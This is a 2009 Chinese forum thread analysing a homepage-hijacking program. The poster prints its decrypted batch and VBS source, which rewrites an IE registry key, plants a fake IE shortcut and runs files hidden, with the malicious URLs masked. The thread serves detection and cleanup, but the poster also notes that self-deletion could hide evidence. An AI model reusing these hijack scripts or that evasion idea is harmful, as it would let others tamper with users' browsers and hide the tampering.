（原创）一个恶意劫持IE浏览器的程序分析！

显示全部楼层 · 发表于 2009-12-30 16:28:26

本帖最后由网之龙于 2009-12-30 16:35 编辑

网之龙本人最近在一台联网的电脑上用Windows清理助手扫描时发现了恶意程序（从源代码分析应该不具备病毒的特征），经检查并成功提取了大部分文件和原代码。初步分析这是一个恶意劫持假冒IE浏览器的东东，这台电脑系统自带的金山毒霸2009版扫描没有反应，后来我用江民2010版、360免费杀毒扫描依然没有任何提示；虽然“Windows清理助手”这个软件扫描发现了，但也不完全，只是查出了VBS脚本程序和伪装的IE快捷方式，而bat可执行文件和jpg图片却漏过了。倒是本人通过它的VBS原代码（BAT程序和VBS程序的代码只要没有加密，可以直接通过系统自己的记事本打开就可以查出来）从而找出了漏网的bat和jpg文件，呵呵。鉴于目前有部分网友经常反映遇到类似恶意劫持IE浏览器而打开恶意网页甚至下载其它软件的流氓程序，所以和大家一同来分析交流一下。
   帖子中的BAT和VBS源代码其实很简单而且简短，此恶意程序的作者直接借用了Windows系统自己本身就有的BAT、VBS程序编辑功能搞出来这么一个东东。其实BAT和VBS脚本语言是最简单易学的语言了，可能有些网友有印象，在中学时教授计算机课时DOS部分就有简单的BAT程序和COM程序的编辑示例，那还不算正式的编程！如果连这都觉得头大，那其它如VB、C语言等更高级的语言我建议你可以不用去学习了……好了言归正传，你准备好了吗……OK，Let's go！
   这个恶意程序分为几部分，其中的comman.bat存在于c:\Windows\system32目录下，原本其内容因为经过加密处理直接用系统的记事本打开后全是乱码。其中的Explorer.vbs脚本程序存在于以下三处 c:\Windows\system32目录下、c:\Documents and Settings\当前用户名\Recent目录下且为快捷方式、“我的电脑”桌面下且为快捷方式（伪装为IE图标）。名为1.vbs脚本程序存在于c:\Windows\system32目录下。名为2.jpg可能包含有广告弹出程序。
   注意：我已经将源代码中的恶意网址地址改为以XXX、YYY之类来显示，以免有人说我散布恶意网址（……嗯，还是小心为上，以免被“和谐”了，嗯嗯）！

comman.bat的内容经过本人用16位进制编辑器解密后还原如下：
-------------------------------------------------------------------------------------------------------------
cls
@reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "\"C:\Program Files\Internet Explorer\IEXPLORE.EXE\" http://XXX.XXX.com/?m" /f
echo [InternetShortcut] >>"%USERPROFILE%\桌面\Internet Explorer.url"
echo URL="www.YYY.com/?m" >>"%USERPROFILE%\桌面\Internet Explorer.url"
echo IconIndex=0 >>"%USERPROFILE%\桌面\Internet Explorer.url"
echo IconFile="C:\Program Files\Internet Explorer\IEXPLORE.EXE" >>"%USERPROFILE%\桌面\Internet Explorer.url"
-------------------------------------------------------------------------------------------------------------
我来解释一下以上语句的意义，有解释不到位不正确的地方，还请各位踊跃拍砖：

cls ——————类似DOS系统的清屏命令，我认为用在这儿没有多少实际意义。
@reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "\"C:\Program Files\Internet Explorer\IEXPLORE.EXE\" http://XXX.XXX.com/?m" /f ——————改写系统注册表，将IE打开的网页设置为“http://XXX.XXX.com/”这个网址。注意原本注册表正常的情况下"HKEY_CLASSES_ROOT……\IEXPLORE.EXE"后面就已经结束了！

echo [InternetShortcut] >>"%USERPROFILE%\桌面\Internet Explorer.url"——————设置当前用户桌面的IE图标快捷方式。
echo URL="www.YYY.com/?m" >>"%USERPROFILE%\桌面\Internet Explorer.url"——————将“www.YYY.com”这个网址打开链接到当前用户桌面IE快捷方式。
echo IconIndex=0 >>"%USERPROFILE%\桌面\Internet Explorer.url"——————设置当前用户桌面IE快捷方式的图标。
echo IconFile="C:\Program Files\Internet Explorer\IEXPLORE.EXE" >>"%USERPROFILE%\桌面\Internet Explorer.url"——————设置当前用户桌面IE快捷方式的图标样式与IE浏览器的图标一致。

……呵呵，还没觉得晕吧？感到头昏眼花的可以暂停休息休息，没晕的接着来！

Explorer.vbs脚本程序代码（未加密）如下：
-------------------------------------------
Set ws = CreateObject("Wscript.Shell")
ws.run "comman.bat",vbhide
-------------------------------------------
以上代码的意义：

Set ws = CreateObject("Wscript.Shell")——————指定VBS脚本语言的专门可解释执行程序（WSH），这个专门可解释执行程序（WSH）是Windows系统默认就包含的。
ws.run "comman.bat",vbhide——————隐藏运行指定的comman.bat可执行程序。这点比在bat程序中直接使用“@echo off”一句要隐蔽，运行comman.bat程序时不会弹出任何窗口就执行了，而通常在bat程序中直接使用“@echo off”一句还会有一个类似DOS的弹出框闪动一下。

1.vbs脚本程序代码（未加密）如下：
-------------------------------------------
Set ws = CreateObject("Wscript.Shell")
ws.run "run.bat",vbhide
ws.run "comman.bat",vbhide
ws.run "2.jpg",vbhide
-------------------------------------------
以上代码的意义：

Set ws = CreateObject("Wscript.Shell")——————指定VBS脚本语言的专门可解释执行程序（WSH），这个专门可解释执行程序（WSH）是Windows系统默认就包含的。
ws.run "run.bat",vbhide——————隐藏运行指定的run.bat程序，但我搜索了硬盘（包括系统文件和隐藏文件）没有找到这个bat程序，不知怎么回事？难道是作者自己摆的乌龙……汗？！
ws.run "comman.bat",vbhide——————隐藏运行指定的comman.bat可执行程序。
ws.run "2.jpg",vbhide——————隐藏运行指定的名为2.jpg图片？这我有点不太清楚的是，jpg格式是图片格式，不是可执行程序，双击一般是直接调用Windows下的图片浏览器打开。经检查这个文件不是双扩展名文件，但Windows清理助手扫描时提示是“弹出广告程序”？难道说图片中合并了广告弹出类可执行文件（比如exe文件）？因为我没有相关检查软件，只好在帖子最后将它放上来供大虾们分析……

网之龙本人最后觉得，这个恶意程序虽然是被动运行（通过欺骗用户去运行它）而不是自己主动加载运行，但作者编写得也不算完美，主要是分成几个不同的文件执行比较繁琐。虽然单个文件代码简短，但合并起来执行却搞复杂了。不知是不是为了躲避杀毒软件的查杀才这么做的？其实用一个VBS程序就应该可以达到同样的目的。而且VBS程序主要是为了引导执行那个BAT程序和JPG图片（鬼知道是不是单纯的图片？）而由comman.bat程序完成主要的功能。但它们一运行后就意味着自己的使命已经结束了，结果能否达到只有等待哪个倒霉蛋去运行那个假冒的IE快捷方式了。所以，BAT程序和VBS程序都可以在最后的一句代码中写入执行完程序后自动删除自身的命令，从而消除自己存在的证据，也不至于让我给抓了现行了，呵呵！而且很重要的一点，不具有自我保护的能力（不象有些有名的流氓程序通过加载驱动之类保护自身）。

最终的声明（前面的你可以不看，这儿请一定要看啊！）：网之龙本人之所以耗时耗力地发这个帖子，并不是教大家如何编写恶意程序（有想歪的人自己面壁思过去，嘿嘿），而是让大家认清类似流氓程序的本来面目并防范和清除它所作的手脚，以后遇到类似问题而杀毒软件解决不了的，你就可以自己举一反三地处理了。因此这帖子还请管理员和版主高抬贵手，不要误杀本帖啦！

   传上那个可疑的名为“2.jpg”图片，大虾们请分析分析：这个流氓程序是怎样进入用户电脑的，是通过网页挂马方式攻击浏览器漏洞达成的还是别的什么方式？是不是通过诱骗让人点击这个jpg图片从而下载到用户的硬盘中？这是我还有疑问的地方。

显示全部楼层 · 发表于 2009-12-30 16:42:43

楼主倒是挺细心的，还发现了漏网之鱼

显示全部楼层 · 发表于 2009-12-30 16:54:01

本帖最后由 adad2008 于 2009-12-30 17:06 编辑

用主防报杀

显示全部楼层 · 发表于 2009-12-30 20:00:01

学习下。

显示全部楼层 · 发表于 2009-12-30 20:19:54

小红伞拒绝访问~~

显示全部楼层 · 发表于 2009-12-30 20:22:43

这就是2.jpg
没啥危害的
vbs会用rundll32开吧

显示全部楼层 · 发表于 2009-12-30 21:43:58

to eset

显示全部楼层 · 发表于 2009-12-30 23:28:22

学习了，这程序比较阴险呀

显示全部楼层 · 发表于 2009-12-30 23:58:55

经测试系属误报~~~！

反病毒引擎       版本       最后更新       扫描结果
a-squared       4.5.0.43       2009.12.30       -
AhnLab-V3       5.0.0.2       2009.12.29       -
AntiVir       7.9.1.122       2009.12.30       TR/StartPage.abh
Antiy-AVL       2.0.3.7       2009.12.30       -
Authentium       5.2.0.5       2009.12.30       -
Avast       4.8.1351.0       2009.12.30       -
AVG       8.5.0.430       2009.12.30       -
BitDefender       7.2       2009.12.30       -
CAT-QuickHeal       10.00       2009.12.30       -
ClamAV       0.94.1       2009.12.30       -
Comodo       3416       2009.12.30       -
DrWeb       5.0.1.12222       2009.12.30       -
eSafe       7.0.17.0       2009.12.29       -
eTrust-Vet       35.1.7206       2009.12.30       -
F-Prot       4.5.1.85       2009.12.30       -
F-Secure       9.0.15370.0       2009.12.30       -
Fortinet       4.0.14.0       2009.12.30       -
GData       19       2009.12.30       -
Ikarus       T3.1.1.79.0       2009.12.30       -
Jiangmin       13.0.900       2009.12.30       -
K7AntiVirus       7.10.934       2009.12.30       -
Kaspersky       7.0.0.125       2009.12.30       -
McAfee       5846       2009.12.29       -
McAfee+Artemis       5846       2009.12.29       -
McAfee-GW-Edition       6.8.5       2009.12.30       Trojan.StartPage.abh
Microsoft       1.5302       2009.12.30       -
NOD32       4729       2009.12.30       -
Norman       6.04.03       2009.12.30       -
nProtect       2009.1.8.0       2009.12.30       -
Panda       10.0.2.2       2009.12.30       -
PCTools       7.0.3.5       2009.12.30       -
Prevx       3.0       2009.12.30       -
Rising       22.28.02.04       2009.12.30       -
Sophos       4.49.0       2009.12.30       -
Sunbelt       3.2.1858.2       2009.12.30       -
Symantec       1.4.4.12       2009.12.30       -
TheHacker       6.5.0.3.121       2009.12.30       -
TrendMicro       9.120.0.1004       2009.12.30       -
VBA32       3.12.12.1       2009.12.30       -
ViRobot       2009.12.30.2116       2009.12.30       -
VirusBuster       5.0.21.0       2009.12.29       -
附加信息

显示全部楼层 · 发表于 2009-12-31 10:14:20

6楼、9楼对这个jpg格式的图片测试结果我看到了，说是没有危害。但为什么这个流氓软件的作者要发这么一个无聊的图片？而且在vbs文件代码中明显有隐蔽执行这个图片的意图。如果此图片真没有问题，有可能就是作者在加入捆绑程序后失效有关（有这种可能，使用一些捆绑合并程序来处理时反而损坏了原本要真正运行的可执行程序），但为什么作者自己就没有测试过？包括那个莫名其妙找不到踪影的run.bat脚本……如果真是作者的疏漏，我只能认为他（她）也太不严谨了（注意，这里严谨是针对单纯编程来说的，与程序要达到的目的无关）！

[可疑文件] （原创）一个恶意劫持IE浏览器的程序分析！

本帖子中包含更多资源

评分

本帖子中包含更多资源